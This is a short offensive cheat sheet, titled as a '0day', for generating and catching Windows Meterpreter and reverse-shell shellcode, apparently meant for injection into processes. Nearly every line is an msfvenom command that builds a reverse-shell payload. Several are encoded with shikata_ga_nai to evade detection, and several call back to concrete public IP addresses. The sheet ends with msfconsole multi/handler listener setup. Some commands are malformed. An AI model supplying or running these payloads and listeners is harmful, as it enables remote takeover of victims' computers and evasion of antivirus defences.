0day Windows/x64 Inject All Processes With Meterpreter Reverse Shell Shellcode
Thread Payload create
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.129 LPORT=1337 EXITFUNC=thread -f csharp
CreateRemoteThread Shellcode Injection difrent mathod
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b \x00\x0a\x0d
- Creating stageless shellcode with MSF-Venom
Shellcode-Downloader-CreateThread-Execution
msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt
msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=45.91.92.112 LPORT=4444 -f raw -o raw.txt
Raw Formate payload metasploits
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o golu
Windows Encoded Meterpreter Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f raw > payload-name.exe
msfvenom -p windows/meterpreter_reverse_tcp LHOST=45.91.92.112 LPORT=4444 –platform windows -a x64 -f raw -o /root/Desktop
shellcode genrator
msfvenom -p windows/meterpreter_reverse_tcp LHOST=199.195.253.181 LPORT=4444 -f c -b \x00\x0a\x0d -o /root/Desktop/c.exe
Launch Console & Load Handler
msfconsole -qx “use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_tcp; set LHOST 45.91.92.112; set LPORT 4444; run”
Load Handler Only
use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_tcp
set LHOST 45.91.92.112
set LPORT 4444
run